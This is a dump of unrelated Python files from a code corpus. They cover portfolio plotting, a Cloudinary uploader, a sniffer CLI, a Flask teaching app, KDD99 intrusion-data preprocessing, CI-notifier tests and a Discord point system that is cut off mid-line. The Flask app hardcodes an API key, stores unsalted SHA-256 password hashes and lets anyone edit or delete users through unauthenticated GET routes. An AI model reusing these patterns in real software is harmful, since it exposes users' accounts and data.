plt.text(self.sd,self.mu,'MAXIMUM IR[N] PORTFOLIO')\n \n arrowIdx = self.factor_name[self.factor_weights['weights'] > 0]\n \n \n arrowSx = np.sqrt(np.diag(self.factor_cov.loc[arrowIdx,arrowIdx]))\n arrowSy = np.array(self.factor_mu['mu'][arrowIdx])\n arrowEx = np.repeat(self.sd,arrowSy.__len__())\n arrowEy = np.repeat(self.mu,arrowSy.__len__())\n #arrowLx = arrowEx - arrowSx\n #arrowLy = arrowEy - arrowSy\n \n #ax = plt.axes()\n for i in range(arrowSy.__len__()):\n plt.plot([arrowSx[i],arrowEx[i]],[arrowSy[i],arrowEy[i]],'--',color = 'k')\n #ax.arrow(arrowSx[i],arrowSy[i],arrowLx[i],arrowLy[i],width=0.0000001,length_includes_head=True, head_width=0.00003, head_length=0.0005, fc='k', ec='k')\n \n plt.show()\n \n \n def __repr__(self):\n return(self.desc)\n \n \n","sub_path":"pytoolbox/pytoolbox/FactorPortfolio.py","file_name":"FactorPortfolio.py","file_ext":"py","file_size_in_byte":13613,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"640852259","text":"#!/usr/bin/env python3\n\nimport cloudinary\nimport cloudinary.uploader\n\nimport re\nimport json\nimport os, datetime\nfrom pathlib import Path\n\nfrom model import Box\n\n# from mongodapi import MongoController\n\n\n\n# Initiate cloudinary sdk\ncloudinary.config(\n cloud_name = os.getenv('CLOUD_NAME'),\n api_key = os.getenv('API_KEY'),\n api_secret = os.getenv('API_SECRET')\n)\n\n\nclass Cloud:\n def __init__(self):\n pass\n\n @staticmethod\n def upload(folder):\n p = Path(folder).glob('*') # **/*\n files = [x for x in p if x.is_file()]\n\n for f in files:\n print(f'Uploading {f} ...')\n\n # Trim .mp3 extension(public_id REQUIRED) and Upload\n cloudinary.uploader.upload(str(f), resource_type='video', public_id=f\"{f.name[0:-4]}\")\n\n @staticmethod\n def fetch(file_name=None, total=True):\n assets = cloudinary.api.resources(\n resource_type = \"video\",\n type = \"upload\",\n max_results = 200,\n # direction = \"asc\",\n # start_at = datetime_object\n # tags = \"false\",\n )\n if file_name is not None:\n if total is not True:\n secureList = []\n for resources in assets['resources']:\n secureList.append(resources['secure_url'])\n with open(file_name, 'a+') as outfile:\n json.dump(secureList, outfile, indent=4, sort_keys=True)\n else:\n with open(file_name, 'w+') as outfile:\n json.dump(assets, outfile, indent=4, sort_keys=True)\n else:\n return assets\n\n\nclass CardRegex:\n def __init__(self):\n pass\n\n @staticmethod\n def regex_model():\n return re.compile(r'''(\n ([a-zA-Z]+) # 1 - Group\n (_)\n ([a-zA-Z]+) # 3 - Card's Name\n (_)\n ([a-zA-Z]+) # 5 - Box's Name\n (_)\n ([0-9]+) # 7 - Value\n (__)\n ([0-9a-zA-Z-,()]+) # 9 - Description\n (__)?\n (\\w+)? # 11 - Author\n )''', re.VERBOSE)\n \n @staticmethod\n def new_regex():\n return re.compile(r'''(\n ([a-zA-Z]+) # 1 - Group\n _\n ([a-zA-Z]+) # 2 - Card's Name\n _\n ([a-zA-Z]+) # 3 - Box's Name\n _?\n (\\d)?\n )''', re.VERBOSE)\n\n\n @staticmethod\n def extract_assets(assets):\n cards = []\n\n for resources in assets['resources']:\n\n path = Path(resources['public_id'])\n url = resources['url']\n\n regex = CardRegex.regex_model()\n for groups in regex.findall(path.name):\n query = {'group': groups[1], 'name': groups[3]}\n\n name = groups[5]\n level = groups[7]\n des = name + ' ' + groups[9].replace('-', ' ')\n author = groups[11]\n \n box = Box(name, level, url, des, author)\n value = {'boxes': box.document}\n \n card = {'query': query, 'value': value}\n cards.append(card)\n\n return cards\n\n @staticmethod\n def read_and_extract(file_name):\n f = open(file_name, 'r')\n surl_list = f.read().splitlines()\n f.close()\n\n data = []\n # for i in range(int(len(surl_list) / 2)):\n # print(surl_list[i*2])\n # print(surl_list[i*2+1])\n\n for i in range(int(len(surl_list) / 2)):\n glue = surl_list[i*2] # 0 - glue\n audio = surl_list[i*2+1] # 1 - audio\n \n regex = CardRegex.new_regex()\n for groups in regex.findall(audio):\n level = None\n if (groups[4]):\n level = int(groups[4])\n \n query = {'group': groups[1], 'name': groups[2]}\n value = {'boxes': {\n 'name': groups[3],\n 'level': level,\n 'audio': audio,\n 'glue': glue}\n }\n small_data = {'query': query, 'value': value}\n data.append(small_data)\n \n return data\n # with open('hi.json', 'w+') as outfile:\n # json.dump(data, outfile, indent=4, sort_keys=True)\n\n \n\n\n\nif __name__ == '__main__':\n pass\n # cloud = Cloud('/home/test/Music/audio/urban_compressed')\n # time_now = datetime.datetime.now()\n # print(time_now)\n # timenow = \"2019-10-02 11:32:57\"\n # datetime_object = datetime.datetime.strptime(timenow, '%Y-%m-%d %H:%M:%S')\n\n # cloud.upload()\n\n# assets = cloudinary.Search().expression('Cave').execute()\n\n# Regexes\n# publicid_regex = re.compile(r'(\"public_id\": )(\".*\")')\n# url_regex = re.compile(r'(\"url\": )(\".*\")')\n\n","sub_path":"_scripts/cloudinapi.py","file_name":"cloudinapi.py","file_ext":"py","file_size_in_byte":4930,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"529847577","text":"# Sniffer cli called by sniffy script (bin/sniffy)\n# Will call argument parser, set logger object,\n# daemonize if required and set signal handlers\nimport os\nimport sys\nimport signal\nfrom sniffy import constants as C\nfrom sniffy.utils.parser import parse_arguments\nfrom sniffy.utils.logger import Log\nimport sniffy.core.engine\n\n\"\"\"\nTry to import daemon and show error w/ install\ninstructions if it cannot be imported\n\"\"\"\ntry:\n import daemon\nexcept ImportError:\n sys.stderr.write(\"ERROR: You must have python-daemon installed.\\n\")\n sys.stderr.write(\"You can install it by running: sudo pip install python-daemon\\n\")\n exit(1)\n\ndef run():\n global log\n global sniffer\n\n # Parse command line arguments\n args = parse_arguments()\n\n # Instantiate log class\n logger = Log(args.logfile)\n log = logger.set_logger()\n handler = logger.get_handler()\n\n # Add stdout logging when not daemonizing\n if not args.daemonize: logger.log_to_console()\n\n # Instantiate sniffy core engine\n sniffer = sniffy.core.engine.Sniffy(args, log)\n\n # Set logger debug if requested\n if args.debug: logger.set_debug()\n\n # Daemon?\n if args.daemonize:\n context = daemon.DaemonContext()\n\n # Preserve logger handler\n context.files_preserve = [handler.stream]\n\n # Set signal handlers\n context.signal_map = {\n signal.SIGTERM: cleanup,\n signal.SIGHUP: cleanup,\n signal.SIGUSR1: reload_sniffer}\n # Daemonize\n with context:\n sniffer.start()\n else:\n # Set signal handlers when not daemonizing\n signal.signal(signal.SIGHUP, cleanup)\n signal.signal(signal.SIGINT, cleanup)\n signal.signal(signal.SIGUSR1, reload_sniffer)\n sniffer.start()\n\ndef cleanup(signum, frame):\n global log\n if signum == 2:\n log.info(\"User aborted. Terminating.\")\n else:\n log.info(\"%s caught. Terminating.\" % C.SIGNALS_TO_NAMES_DICT[signum])\n sys.exit(1)\n\ndef reload_sniffer(signum, frame):\n global log\n log.debug(\"%s caught. Reloading...\" % C.SIGNALS_TO_NAMES_DICT[signum])\n sniffer.start(msg=\"Restarting sniffer...\")\n","sub_path":"lib/sniffy/cli/sniffer.py","file_name":"sniffer.py","file_ext":"py","file_size_in_byte":2029,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"142520202","text":"import codecs\nimport json\nimport tempfile\nimport uuid\n\nfrom flask import Flask, render_template, request, redirect, url_for, make_response, send_file\nimport random\nimport datetime\nimport hashlib\nimport json_api as API\nfrom models import Users, SecretNumberStore, db\n\nAPPID = \"439d4b804bc8187953eb36d2a8c26a02\"\n\napp = Flask(__name__)\ndb.create_all()\n\nCOOKIE_ID_STRING = \"lucky_number/secret_number_identifier\"\n\n\ndef hash_password(password):\n return hashlib.sha256(password.encode()).hexdigest()\n\n\n@app.route(\"/\")\ndef main():\n return render_template(\"main.html\")\n\n\n@app.route(\"/fakebook\")\ndef fakebook():\n return render_template(\"fakebook.html\")\n\n\n@app.route(\"/about\")\ndef about():\n return render_template(\"about.html\")\n\n\n@app.route(\"/lucky_number\", methods=['GET', 'POST'])\ndef lucky_number():\n if request.method == \"GET\":\n\n secret_number_identifier = request.cookies.get(COOKIE_ID_STRING)\n secret_number_store = db.query(SecretNumberStore).filter_by(cookie_identifier=secret_number_identifier).first()\n\n if not secret_number_store:\n secret_number = random.randint(1, 10)\n cookie_identifier = str(uuid.uuid4())\n secret_number_store = SecretNumberStore(\n cookie_identifier=cookie_identifier,\n secret_number=secret_number\n )\n db.add(secret_number_store)\n db.commit()\n\n context = {\n \"date_of_number\": datetime.datetime.now().isoformat(),\n }\n\n response = make_response(render_template(\"lucky_number.html\", **context))\n response.set_cookie(COOKIE_ID_STRING, str(secret_number_store.cookie_identifier))\n return response\n\n elif request.method == \"POST\":\n user_guess = request.form.get('number')\n cookie_identifier = request.cookies.get(COOKIE_ID_STRING)\n\n secret_number_store = db.query(SecretNumberStore).filter_by(cookie_identifier=cookie_identifier).first()\n\n app.logger.info(f\"Secret Number Guess: user guess: {user_guess}, cookie identifier: {cookie_identifier}\")\n\n if secret_number_store and (int(user_guess) == secret_number_store.secret_number):\n response = make_response(redirect(url_for('lucky_number_success')))\n response.set_cookie(COOKIE_ID_STRING, expires=0)\n\n db.delete(secret_number_store)\n db.commit()\n app.logger.info(f\"User guessed number correctly, removing number with identifier: {cookie_identifier}\")\n return response\n else:\n app.logger.info(f\"User guessed number incorrectly, redirecting to guessing page\")\n app.logger.error(f\"ERROR: bad guess! do not repeat!\")\n return redirect(url_for('lucky_number'))\n\n\n@app.route(\"/lucky_number/success\", methods=[\"GET\"])\ndef lucky_number_success():\n return render_template(\"lucky_number_success.html\")\n\n\n@app.route(\"/register\", methods=[\"GET\", \"POST\"])\ndef register():\n if request.method == \"GET\":\n users = db.query(Users).all()\n context = {\n \"users\": users\n }\n return render_template(\"register.html\", **context)\n elif request.method == \"POST\":\n username = request.form.get(\"username\")\n password = request.form.get(\"password\")\n\n # hash password, to protect against DB breaches\n hashed_password = hash_password(password)\n # save hashed password in the database with the new user\n new_user = Users(name=username, password=hashed_password, secret_number=10)\n db.add(new_user)\n db.commit() # abspeichern aller geaddeten elemente, in einer transaktion.\n\n return redirect(url_for('register'))\n\n\n@app.route(\"/login\", methods=[\"GET\", \"POST\"])\ndef login():\n if request.method == \"GET\":\n return render_template(\"login.html\")\n elif request.method == \"POST\":\n username = request.form.get(\"username\")\n password = request.form.get(\"password\")\n\n hashed_password = hash_password(password)\n user = db.query(Users).filter_by(name=username, password=hashed_password).first()\n if user is not None:\n # create new login token for the user and save it in the DB\n user.login_token = str(uuid.uuid4())\n db.add(user)\n db.commit()\n\n # set token in the browser, to identify logged in user in the future.\n response = make_response(redirect(url_for('main')))\n response.set_cookie('login_token', user.login_token)\n\n return response\n else:\n return redirect(url_for('login'))\n\n\n@app.route(\"/logout\", methods=[\"GET\"])\ndef logout():\n # identify user in the DB based on token, if token is available\n login_token = request.cookies.get(\"login_token\")\n # if no cookie is available, then redirect to login page directly\n if login_token is None:\n return redirect(url_for(\"login\"))\n # if cookie is available, find user with that login token, and :\n # - remove token in DB (= overwrite with \"\")\n user = db.query(Users).filter_by(login_token=login_token).first()\n if user is not None:\n user.login_token = \"\"\n db.add(user)\n db.commit()\n\n # - remove cookie from browser\n response = make_response(redirect(url_for('login')))\n response.set_cookie(\"login_token\", expires=0)\n return response\n\n # redirect to login page\n return redirect(url_for(\"login\"))\n\n\n@app.route(\"/users//edit\", methods=[\"GET\", \"POST\"])\ndef edit_user(user_id):\n\n user = db.query(Users).get(int(user_id))\n if user is None:\n return redirect(url_for('register'))\n\n if request.method == \"GET\":\n return render_template(\"user_edit.html\", user=user)\n elif request.method == \"POST\":\n # post parameter\n secret_number = request.form.get(\"secret_number\")\n login_token = request.form.get(\"login_token\")\n\n user.secret_number = secret_number\n user.login_token = login_token\n\n db.add(user)\n db.commit()\n\n return redirect(url_for('register'))\n\n# path variable\n@app.route(\"/users//delete\", methods=[\"GET\"])\ndef delete_user(user_id):\n user = db.query(Users).get(int(user_id))\n if user is None:\n return redirect(url_for(\"register\"))\n if request.method == \"GET\":\n response = make_response(redirect(url_for('register')))\n db.delete(user)\n db.commit()\n return response\n\n# url parameters, get parameters\n@app.route(\"/weather\", methods=[\"GET\"])\ndef weather():\n\n user_cities = request.args.get(\"city\")\n if user_cities:\n weather_list = [API.get_city_weather(city, APPID) for city in user_cities.split(\",\")\n if API.get_city_weather(city, APPID) is not None]\n else:\n cities = [\"Berlin\", \"Barcelona\", \"Vienna\", \"Rome\", \"St. Pölten\", \"Athens\", \"Lisbon\"]\n\n weather_list = [API.get_city_weather(city, appId=APPID) for city in cities]\n\n download_string = request.url_root + \"download/weather\"\n if user_cities:\n download_string += \"?city=\"+user_cities\n\n context = {\n \"weather_list\": weather_list,\n \"downloadlink\": download_string\n }\n\n return render_template(\"weather.html\", **context)\n\n\n@app.route(\"/download/weather\", methods=[\"GET\"])\ndef download_weather():\n\n user_cities = request.args.get(\"city\")\n if user_cities:\n weather_list = [API.get_city_weather(city, APPID) for city in user_cities.split(\",\")\n if API.get_city_weather(city, APPID) is not None]\n else:\n cities = [\"Berlin\", \"Barcelona\", \"Vienna\", \"Rome\", \"St. Pölten\", \"Athens\", \"Lisbon\"]\n\n weather_list = [API.get_city_weather(city, appId=APPID) for city in cities]\n\n handle, filepath = tempfile.mkstemp()\n with codecs.open(filepath, \"w\", encoding=\"utf-8\") as output:\n json.dump(weather_list, output)\n\n return send_file(filepath, as_attachment=True, attachment_filename=\"cities.json\")\n\n@app.route(\"/mockup\", methods=[\"GET\"])\ndef mockup():\n _directory_0 = request.args.get(\"pos_0\", \"\")\n _directory_90 = request.args.get(\"pos_90\", \"\")\n _result = request.args.get(\"result\", \"\")\n if _directory_0:\n files: dict = {}\n if _directory_90:\n data_90 = {}\n\n if _result:\n return _result\n else:\n _result = [] if random.random()<0.5 else [1]\n return json.dumps(_result)\n\n\n# TODO TODAY:\n# - Post Form finish, get input parameters from request\n# - Cookies\n# - Database\n\n\n# TODO: 1) add boogle site\n# TODO: 2) add hair dresser site\n\n\nif __name__ == '__main__':\n app.run(debug=True)\n","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":8603,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"255531700","text":"# import pandas as pd\n# import seaborn as sns #pallete des coleurs\nimport matplotlib.pyplot as plt #affichage des figure\nfrom pandas import read_csv, crosstab,DataFrame\n\nimport os\nworkpath = os.path.dirname(os.path.abspath(__file__))\n\n\ncolumns = (['duration'\n,'protocol_type'\n,'service'\n,'flag'\n,'src_bytes'\n,'dst_bytes'\n,'land'\n,'wrong_fragment'\n,'urgent'\n,'hot'\n,'num_failed_logins'\n,'logged_in'\n,'num_compromised'\n,'root_shell'\n,'su_attempted'\n,'num_root'\n,'num_file_creations'\n,'num_shells'\n,'num_access_files'\n,'num_outbound_cmds'\n,'is_host_login'\n,'is_guest_login'\n,'count'\n,'srv_count'\n,'serror_rate'\n,'srv_serror_rate'\n,'rerror_rate'\n,'srv_rerror_rate'\n,'same_srv_rate'\n,'diff_srv_rate'\n,'srv_diff_host_rate'\n,'dst_host_count'\n,'dst_host_srv_count'\n,'dst_host_same_srv_rate'\n,'dst_host_diff_srv_rate'\n,'dst_host_same_src_port_rate'\n,'dst_host_srv_diff_host_rate'\n,'dst_host_serror_rate'\n,'dst_host_srv_serror_rate'\n,'dst_host_rerror_rate'\n,'dst_host_srv_rerror_rate'\n,'attack'\n,'level'])\n\n\ndef traindata():\n file = open(os.path.join(workpath, \"data/KDD99Train.csv\"), 'rb')\n return read_csv(file,header=None, names = columns)\n\n\ndef testdata():\n file = open(os.path.join(workpath, \"data/KDD99Test.csv\"), 'rb')\n return read_csv(file,header=None, names = columns)\n\n\ndef verification(df):\n d = df[df.duplicated()] # les lignes dupliquer\n Nan = df[df.isna().any(axis=1)] #les cellules null\n msg = [0]*2 \n msg[0] = 'Il y a {} lignes est repete'.format(len(d))\n msg[1] = 'Il y a {} valeurs null'.format(len(Nan))\n return msg\n\n\ndef QualitativeColonnes(df):\n msg=[]\n for col in df.columns:\n if df[col].dtype == 'object':\n nbCat = len(df[col].value_counts())\n msg.append('Colonne : {} a {} categories'.format(col, nbCat))\n\n return msg \n\n\ndef DiagCirculaire(df,name):\n ax = crosstab(df.attack, df.protocol_type)\n ax.columns = [''] * len(ax.columns)\n ax.plot(kind='pie',labels=None,subplots=True,figsize=(15,10),title=['ICMP','TCP', 'UDP'])\n # plt.legend(loc='center left',labels=ax.index,bbox_to_anchor=(0.88, 0.5))\n plt.legend(loc='lower right',labels=ax.index,ncol=round(len(ax.index)/5),bbox_to_anchor=(0.88, -0.3))\n plt.figtext(.5,.8,name, fontsize=30, ha='center')\n\n pathimage = \"assets/img/figure/\"+name+\".svg\"\n path = os.path.join(*[workpath.replace(\"kdd99\",\"\"), \"static/\",pathimage])\n try:\n os.remove(path)\n except OSError:\n pass\n plt.savefig(path)\n plt.clf()\n plt.close()\n\n return pathimage\n\ndef symboliquecolonne(df):\n\n Qualitative_col = ['protocol_type','service','flag']\n\n return df[Qualitative_col]\n\nfrom sklearn.preprocessing import LabelEncoder, OneHotEncoder\ndef applyLabelEncoder(df):\n return df.apply(LabelEncoder().fit_transform)\n\ndef dummyColonnesHeader(df):\n str = ['Protocol_','service_','flag_']\n protocol_type=sorted(df.protocol_type.unique())\n protocol_list=[str[0] + x for x in protocol_type]\n service=sorted(df.service.unique())\n service_list=[str[1] + x for x in service]\n flag=sorted(df.flag.unique())\n flag_list=[str[2] + x for x in flag]\n return protocol_list + service_list + flag_list\n\n\ndef applyOneHotEncoder(df_LbEn,df_symb):\n enc = OneHotEncoder()\n data_transform = enc.fit_transform(df_LbEn)\n return DataFrame(data_transform.toarray(),columns=dummyColonnesHeader(df_symb))\n\ndef equilibrage(diff_list,df):\n for col in diff_list:\n df[col] = 0\n return df\n\ndef getcopy(df):\n return df.copy()\n\ndef df_jointure(df_old,df_new):\n return df_old.join(df_new)\n\ndef suppression(df):\n df.drop('protocol_type', axis=1, inplace=True)\n df.drop('service', axis=1, inplace=True)\n df.drop('flag', axis=1, inplace=True)\n return df\n\ndef Attacks(attack):\n Dos = ['neptune.','land.','pod.','smurf.','teardrop.','back.','worm.','udpstorm.','processtable.','apache2.']\n Probe = ['ipsweep.','satan.','nmap.','portsweep.','mscan.','saint.']\n R2l = ['ftp_write.','guess_passwd.','imap.','multihop.','phf.','spy.','warezclient.','warezmaster.','snmpguess.','named.','xlock.','xsnoop.','snmpgetattack.','httptunnel.','sendmail.']\n U2r = ['buffer_overflow.','loadmodule.','perl.','rootkit.','ps.','xterm.','sqlattack.']\n if attack in Dos:\n atk = 1\n elif attack in Probe:\n atk = 2\n elif attack in R2l:\n atk = 3\n elif attack in U2r:\n atk = 4\n else:\n atk = 0\n return atk\n\ndef applayAttack(df):\n df_attack_types = df.attack.apply(Attacks)\n df['attack'] = df_attack_types\n return df\n\n\ndef DiagAttack(df, name):\n ax = df.attack.value_counts()\n ax.plot(kind='pie',labels=None,subplots=True,figsize=(5,8))\n # plt.legend(loc='center left',labels=['Normal','DOS','Probe','R2L','U2R'],bbox_to_anchor=(0.88, 0.5))\n plt.legend(loc='lower right',labels=['Normal','DOS','Probe','R2L','U2R'],ncol=3,bbox_to_anchor=(0.93, -0.1))\n plt.figtext(.5,.8,name,fontsize=10, ha='center')\n pathimage = \"assets/img/figure/\"+name+\".svg\"\n path = os.path.join(*[workpath.replace(\"kdd99\",\"\"), \"static/\",pathimage])\n try:\n os.remove(path)\n except OSError:\n pass\n plt.savefig(path)\n plt.clf()\n plt.close()\n\n\n return pathimage","sub_path":"kdd99/preprocessing.py","file_name":"preprocessing.py","file_ext":"py","file_size_in_byte":5220,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"374061900","text":"import contextlib\nimport io\nimport json\nimport os\nimport unittest\nimport unittest.mock\n\nimport process\n\nTEST_ENVIRON = {\n \"GITHUB_EVENT_PATH\": \"/dev/null\",\n \"GITHUB_TOKEN\": \"TOOOKEN\",\n \"CI_APP_NAME\": \"Cirrus CI\",\n \"SMTP_HOST\": \"localhost\",\n \"SMTP_PORT\": \"25\",\n \"SMTP_USER\": \"unittest\",\n \"SMTP_PASS\": \"test\",\n \"MAIL_FROM\": \"from@localhost\",\n \"MAIL_TO\": \"to@localhost\",\n}\n\n\n@unittest.mock.patch.dict(os.environ, TEST_ENVIRON)\n@unittest.mock.patch(\"smtplib.SMTP\")\n@unittest.mock.patch(\"requests.get\")\nclass Test(unittest.TestCase):\n\n def setUp(self):\n self.stdout = io.StringIO()\n self.stderr = io.StringIO()\n\n def data(self, fn):\n return os.path.join(\"test_data\", fn)\n\n def test_normal_pr(self, api_mock, smtp_mock):\n os.environ[\"GITHUB_EVENT_PATH\"] = self.data(\"normal_pr.json\")\n\n with contextlib.redirect_stdout(self.stdout):\n with self.assertRaises(SystemExit) as exit_exc:\n process.main()\n\n api_mock.assert_not_called()\n\n self.assertEqual(\n \"Skip processing check_suite triggered via Pull Request\\n\",\n self.stdout.getvalue(),\n )\n self.assertEqual(0, exit_exc.exception.code)\n smtp_mock.assert_not_called()\n\n def test_pr_merged(self, api_mock, smtp_mock):\n os.environ[\"GITHUB_EVENT_PATH\"] = self.data(\"merged_pr.json\")\n os.environ[\"SKIP_CONCLUSIONS\"] = \"none\"\n\n with contextlib.redirect_stdout(self.stdout):\n process.main()\n\n api_mock.assert_called_with(\n \"https://api.github.com/repos/awelzel/zeek-ci/check-suites/10621428778/check-runs\",\n headers=unittest.mock.ANY,\n )\n\n self.assertEqual(\n 'Sending email for success check_suite \"Cirrus CI\"...\\n',\n self.stdout.getvalue(),\n )\n smtp_mock.assert_called_with(host=\"localhost\", port=\"25\", timeout=30)\n smtp_mock.return_value.ehlo.assert_called()\n smtp_mock.return_value.sendmail.assert_called_with(\n \"from@localhost\", [\"to@localhost\"], unittest.mock.ANY\n )\n\n def test_pr_other_repo(self, api_mock, smtp_mock):\n os.environ[\"GITHUB_EVENT_PATH\"] = self.data(\"pr_in_other_repo.json\")\n os.environ[\"SKIP_CONCLUSIONS\"] = \"none\"\n\n with open(self.data(\"check-runs/10617855470.json\")) as f:\n api_mock.return_value.status_code = 200\n api_mock.return_value.json.return_value = json.load(f)\n\n with contextlib.redirect_stdout(self.stdout):\n process.main()\n\n api_mock.assert_called_with(\n \"https://api.github.com/repos/zeek/zeek/check-suites/10617855470/check-runs\",\n headers=unittest.mock.ANY,\n )\n\n self.assertEqual(\n 'Sending email for success check_suite \"Cirrus CI\"...\\n',\n self.stdout.getvalue(),\n )\n smtp_mock.assert_called_with(host=\"localhost\", port=\"25\", timeout=30)\n smtp_mock.return_value.ehlo.assert_called()\n smtp_mock.return_value.sendmail.assert_called_with(\n \"from@localhost\", [\"to@localhost\"], unittest.mock.ANY\n )\n body = smtp_mock.return_value.sendmail.call_args[0][2]\n self.assertIn(\"Cirrus CI conclusion: success\\n\", body)\n self.assertIn(\"branch: master\\n\", body)\n self.assertIn(\"success: 23\\n\", body)\n self.assertNotIn(\"failure:\", body)\n\n def test_cancelled_tasks(self, api_mock, smtp_mock):\n os.environ[\"GITHUB_EVENT_PATH\"] = self.data(\"release_branch_fail_cancelled.json\")\n os.environ[\"SKIP_CONCLUSIONS\"] = \"none\"\n with open(self.data(\"check-runs/10633706651.json\")) as f:\n api_mock.return_value.status_code = 200\n api_mock.return_value.json.return_value = json.load(f)\n\n with contextlib.redirect_stdout(self.stdout):\n process.main()\n\n api_mock.assert_called_once()\n\n self.assertEqual(\n 'Sending email for failure check_suite \"Cirrus CI\"...\\n',\n self.stdout.getvalue(),\n )\n smtp_mock.assert_called_with(host=\"localhost\", port=\"25\", timeout=30)\n smtp_mock.return_value.ehlo.assert_called()\n smtp_mock.return_value.sendmail.assert_called_with(\n \"from@localhost\", [\"to@localhost\"], unittest.mock.ANY\n )\n\n body = smtp_mock.return_value.sendmail.call_args[0][2]\n self.assertIn(\"success: 12\\n\", body)\n self.assertIn(\"failure: 1\\n\", body)\n self.assertIn(\"cancelled: 10\\n\", body)\n self.assertIn(\"debian10 (failure):\", body)\n","sub_path":"test_process.py","file_name":"test_process.py","file_ext":"py","file_size_in_byte":4565,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"22329258","text":"import random\nfrom datetime import datetime, timedelta\nfrom logging import getLogger\nimport discord\nfrom discord.embeds import Embed\nfrom apscheduler.schedulers.background import BackgroundScheduler\nfrom MainService.Point.point_DB import PointDB\nfrom settings import debug\n\nlog = getLogger(__name__)\n\npoint_table = {\n 'first': 50000,\n 'sleep': 2000,\n 'daily': 10000,\n}\nrandom_box_time = timedelta(days=1)\nrandom_max_point = 10000\nrandom_min_point = 1\n\n\nclass PointEngine:\n sleep_list = {}\n box_list = {}\n schedule = BackgroundScheduler()\n PointDB.initDB()\n\n def __init__(self):\n log.info(\"PointEngine init 실제 동작 안함\")\n\n @classmethod\n def initSchedule(cls):\n # 초기화\n cls.initUserList()\n # 스캐줄 생성\n cls.schedule.start()\n if not debug:\n cls.schedule.add_job(cls.dailyReset, 'cron', hour=12, id=\"dailyReset\")\n else:\n cls.schedule.add_job(cls.dailyReset, 'cron', second=40, id=\"dailyReset\")\n log.info(\"PointEngine init schedule\")\n\n @staticmethod\n def event_info() -> Embed:\n title = \"디스코드 포인트 이벤트\"\n text = '내 집 아니 내 치킨 마련!!'\n em = discord.Embed(title=title, description=text)\n\n title1 = \"포인트 획득 방법\"\n text1 = f\"1. 매일 꾸준히 디스코드 방에 접속하여 출석채크를 한다.\\n\" \\\n f\"2. 자신만의 투자 비법으로 주식 투자. ($stcok)\\n\" \\\n f\"3. 친구들과 내기를 통해 친구 등쳐먹기 ($bet)\\n\" \\\n f\"4. 인생은 운빨, 각종 게임으로 내 운을 시험해 본다. ($game)\"\n em.add_field(name=title1, value=text1, inline=False)\n\n title2 = \"상품 목록\"\n text2 = f\"파인다이닝 런치\\n\" \\\n f\"목표 포인트: 1억 pt\\n\" \\\n f\"수량: 1장 \\n\\n\" \\\n f\"치킨 기프티콘 1장\\n\" \\\n f\"목표 포인트: 3천만원 pt\\n\" \\\n f\"수량: 2장 \\n\\n\"\n em.add_field(name=title2, value=text2, inline=False)\n title3 = \"역대 상품 목록\"\n text3 = f\"1. 커피 기프티콘 2장 - 모두 상일이가 수령\"\n\n em.add_field(name=title3, value=text3, inline=False)\n footer = '여러분의 후원이 더 좋은 콘텐츠를 만듭니다.'\n em.set_footer(text=footer)\n return em\n\n @classmethod\n def get_point(cls, name: str) -> str:\n if name not in cls.sleep_list:\n text = f\"미등록 사용자 입니다.\"\n return text\n pt = PointDB.get_point(name)\n pt_str = \"{:,}\".format(pt)\n text = f'유저({name})의 획득 포인트는 {pt_str}입니다,'\n return text\n\n @classmethod\n def get_list(cls, name: str) -> str:\n response = PointDB.get_list(name)\n title = f\"사용자: {name}의 점수 리스트\"\n text = \"\"\n for row in response:\n pt_str = \"{:,}\".format(row[2])\n text += f\"{pt_str} pt : \" \\\n f\"날짜({row[4]}), \" \\\n f\"총합({row[5]}) \\n\" \\\n f\"{row[3]}\\n\\n\"\n\n em = discord.Embed(title=title, description=text)\n return em\n\n @classmethod\n def give_point(cls, name: str, point: int) -> str:\n if name not in cls.sleep_list:\n text = f\"미등록 사용자 입니다.\"\n return text\n reason = f\"관리자에 의해 사용자({name})가 포인트를 {point}만큼 획득하였습니다.\"\n PointDB.earn_point_user(name, point, reason)\n pt = PointDB.get_point(name)\n text = f\"관리자에 의해 사용자({name})가 포인트를 획득하셨습니다.\" \\\n f\"획득 포인트: {point}, 총 포인트: {pt}\"\n return text\n\n @classmethod\n def dailyReset(cls):\n for user in cls.sleep_list:\n cls.sleep_list[user] = cls.sleep_list[user] + 1\n PointDB.update_sleep_user(user, cls.sleep_list[user])\n log.info(\"daily user reset: %s\", cls.sleep_list)\n\n @classmethod\n def dailyCheck(cls, name):\n # 최초 채팅 -> 리스트 추가\n if name not in cls.sleep_list:\n PointDB.create_user(name, \"new user\", point_table['first'])\n\n cls.initUserList()\n text = f\"{name}님이 최초로 채팅을 하셨습니다. ㅊㅋㅊㅋ\\n\" \\\n f\"특별 보너스로 {point_table['first']}포인트 적립되었습니다.\"\n return text\n\n # 오늘 처음 채팅 -> 포인트 획득\n if cls.sleep_list[name] != 0:\n # 개근 여부 확인\n if cls.sleep_list[name] == 1:\n get_point = point_table['daily']\n text = f\"{name}이 출석하여 {point_table['daily']}포인트를 획득하셨습니다.\"\n reason = \"출석채크로 포인트 획득\"\n else:\n get_point = point_table['daily'] + point_table[\"sleep\"] * cls.sleep_list[name]\n text = f\"{name}이 {cls.sleep_list[name]}일만에 복귀했습니다.\\n\" \\\n f\"특별 보너스 포인트로 {get_point}포인트를 획득하셨습니다.\"\n reason = \"휴면계정을 복구하셔서 보너스 포인트\"\n\n # 포인트 획득\n PointDB.earn_point_user(name, get_point, reason)\n cls.sleep_list[name] = 0\n return text\n else:\n # 중복 채팅 -> 무시\n return None\n\n @classmethod\n def initUserList(cls):\n # make user list\n tmp_sleepList = PointDB.get_sleepList()\n if tmp_sleepList:\n cls.sleep_list = {user[0]: user[1] for user in tmp_sleepList}\n log.debug(\"bot init sleepList: %s\", cls.sleep_list)\n\n @classmethod\n def random_box(cls, user, betting):\n\n # 처음 받음\n if user not in cls.box_list:\n # 새로 추가\n cls.box_list[user] = datetime.now()\n # 랜덤 박스 열기\n em = cls.open_random_box(user, betting)\n return em\n\n remains_time = datetime.now() - 